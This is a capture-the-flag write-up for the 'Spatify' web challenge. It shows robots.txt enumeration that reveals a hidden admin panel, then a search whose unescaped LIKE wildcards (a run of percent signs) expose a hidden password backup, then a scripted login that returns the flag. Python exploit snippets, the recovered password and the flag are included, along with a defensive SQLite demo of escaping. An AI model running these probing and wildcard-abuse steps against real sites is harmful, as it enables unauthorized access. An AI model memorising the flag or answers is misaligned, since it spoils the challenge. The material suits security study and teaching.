Spatify
Easy
150
Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!
Running the Burp Suite crawler (any crawler would do) discovered a /robots.txt file. The robots.txt file tells search-engine crawlers which URLs they may access on a site; for an attacker, its Disallow entries are a list of paths the site owner would rather nobody looked at, so they are the first thing to check.

from requests import get, post

# Challenge instance URL.
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
file = '/robots.txt'
response = get(url + file)
print(response.text)
User-agent: *
Disallow: /superhiddenadminpanel/
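As an added helper (not part of the original writeup or the challenge), the robots.txt step done without a crawler: parse the file into per-agent rule groups and turn every Disallow entry into an absolute URL to probe. The sample file is constructed: only the "User-agent: *" group with /superhiddenadminpanel/ reproduces what Spatify served; the Googlebot group, the comments and the extra path /static/backups/ are added to exercise the parser and do not exist on the challenge host.

```python
from urllib.parse import urljoin

# Constructed sample; only the "User-agent: *" / "/superhiddenadminpanel/"
# group reproduces what Spatify actually served.
SAMPLE_ROBOTS = """\
# Spatify crawler rules
User-agent: Googlebot
Disallow:

User-agent: *
Disallow: /superhiddenadminpanel/
Disallow: /static/backups/   # constructed, not on the real host
Allow: /static/audio/
Sitemap: https://example.invalid/sitemap.xml
"""


def parse_robots(text):
    """Parse robots.txt into {agent: {"allow": [...], "disallow": [...]}}.
    Consecutive User-agent lines share one rule group; a rule line closes the
    group, so the next User-agent starts a new one. Comments (# ...) are
    stripped and an empty Disallow (meaning 'nothing blocked') is ignored."""
    groups = {}
    agents = []
    group_open = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        field, sep, value = line.partition(":")
        if not sep:
            continue  # blank line, comment-only line, or malformed
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if not group_open:
                agents = []
                group_open = True
            agents.append(value)
            groups.setdefault(value, {"allow": [], "disallow": []})
        elif field in ("allow", "disallow"):
            group_open = False
            if value:
                for agent in agents:
                    groups[agent][field].append(value)
        # other fields (Sitemap, Crawl-delay, ...) carry no path hints here
    return groups


def candidate_urls(text, base_url):
    """Every Disallow path from every group, deduplicated in file order and
    joined to base_url: the list an attacker probes first."""
    paths = []
    for rules in parse_robots(text).values():
        for path in rules["disallow"]:
            if path not in paths:
                paths.append(path)
    return [urljoin(base_url, p) for p in paths]


if __name__ == "__main__":
    for target in candidate_urls(SAMPLE_ROBOTS, "https://example.invalid"):
        print("probe:", target)
```

Feed the real file's text to candidate_urls with the challenge URL as base_url and request each result; on Spatify that yields the admin panel path straight away.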
The Spatify admin panel at /superhiddenadminpanel/ can only be accessed with a password. The Spatify home page / searches for music by name.
The music listed on the home page by default:

<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>
The search requires input of at least five characters. The word common to all three music names is FEATURED, and searching for FEATURED returns exactly the home page's default music.
I assume the search is implemented with the SQL LIKE operator. The LIKE operator is used in a WHERE clause to search for a specified pattern in a column. Two wildcards are often used in conjunction with it:
- The percent sign (%) represents zero, one, or multiple characters
- The underscore sign (_) represents one single character

SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern;
Searching for FEATURE% returns the same result as FEATURED and the home page, which means the user input goes into the LIKE pattern unescaped: % and _ are interpreted by the database as wildcards instead of being matched literally. A search made only of percent signs (at least five, to satisfy the minimum length) therefore matches every record, including any the FEATURED search never shows. Listing all music records with q=%%%%%% returns:
<div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>
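As an added example (not part of the original writeup), the wildcard behaviour described above reproduced against an in-memory SQLite table. The catalog rows mimic what the Spatify search returned, but the table name, columns and query shape are assumptions; the challenge's real query is unknown. The vulnerable function binds the input as a parameter, so this is not classic SQL injection, yet % and _ in the input are still interpreted; the hardened variant escapes them and adds an ESCAPE clause, while keeping the application's own surrounding wildcards.

```python
import sqlite3

# Constructed catalog mimicking the records the Spatify search returned
# (three [FEATURED] tracks plus the hidden backup). The table "music" and
# its columns are assumptions; the challenge's real schema is unknown.
TRACKS = [
    ("😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋", "/static/audio/secret_password_backup.txt.bak"),
    ("[FEATURED] Goldn - Praz Khanal", "/static/audio/goldn.mp3"),
    ("[FEATURED] Guitar Electro Sport Trailer - Gvidon", "/static/audio/guitar.mp3"),
    ("[FEATURED] Learn SQL in 3 minutes", "/static/audio/learn_sql.mp3"),
]

MIN_QUERY_LEN = 5  # the five-character minimum the Spatify search enforces


def make_db():
    """In-memory SQLite catalog loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE music (name TEXT NOT NULL, src TEXT NOT NULL)")
    conn.executemany("INSERT INTO music VALUES (?, ?)", TRACKS)
    return conn


def search_vulnerable(conn, q):
    """Search as Spatify appears to do it: the input is bound as a parameter
    (so no classic SQL injection), but it is dropped into the LIKE pattern
    unescaped, so % and _ in the input act as wildcards."""
    if len(q) < MIN_QUERY_LEN:
        return []
    rows = conn.execute(
        "SELECT name FROM music WHERE name LIKE ?", ("%" + q + "%",)
    )
    return [name for (name,) in rows]


def escape_like(q, esc="\\"):
    """Escape LIKE metacharacters so the input is matched literally.
    The escape character itself must be escaped first."""
    return (q.replace(esc, esc + esc)
             .replace("%", esc + "%")
             .replace("_", esc + "_"))


def search_hardened(conn, q):
    """Same query with the user input escaped and an ESCAPE clause; the
    application's own surrounding % wildcards remain."""
    if len(q) < MIN_QUERY_LEN:
        return []
    pattern = "%" + escape_like(q) + "%"
    rows = conn.execute(
        "SELECT name FROM music WHERE name LIKE ? ESCAPE '\\'", (pattern,)
    )
    return [name for (name,) in rows]


def hidden_records(conn):
    """Records reachable only through wildcard abuse: everything the
    all-wildcards query returns that a plain FEATURED search does not."""
    everything = search_vulnerable(conn, "%" * MIN_QUERY_LEN)
    featured = set(search_vulnerable(conn, "FEATURED"))
    return [name for name in everything if name not in featured]


if __name__ == "__main__":
    db = make_db()
    for q in ("FEATURED", "FEATURE%", "%" * MIN_QUERY_LEN):
        print(f"{q!r}: vulnerable={len(search_vulnerable(db, q))} "
              f"hardened={len(search_hardened(db, q))}")
    print("hidden:", hidden_records(db))
```

The minimum-length check is kept in both variants to show that it is no defence on its own: five percent signs satisfy it and still match everything. Escaping is the fix; an alternative is a full-text or equality search that never builds a LIKE pattern from user input.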
# The "audio" source of the hidden record is a plain-text backup; fetch it directly.
file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
THISISTHEPASSWORDTOTHEADMINPANEL123321123321
import re

# Log in to the admin panel with the recovered password (url and post come
# from the first snippet) and pull the flag out of the response body.
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search(r'BlackHatMEA\{[^}]*\}', html)
print(flag.group(0))
BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}
- https://developers.google.com/search/docs/crawling-indexing/robots/intro
- https://www.w3schools.com/sql/sql_like.asp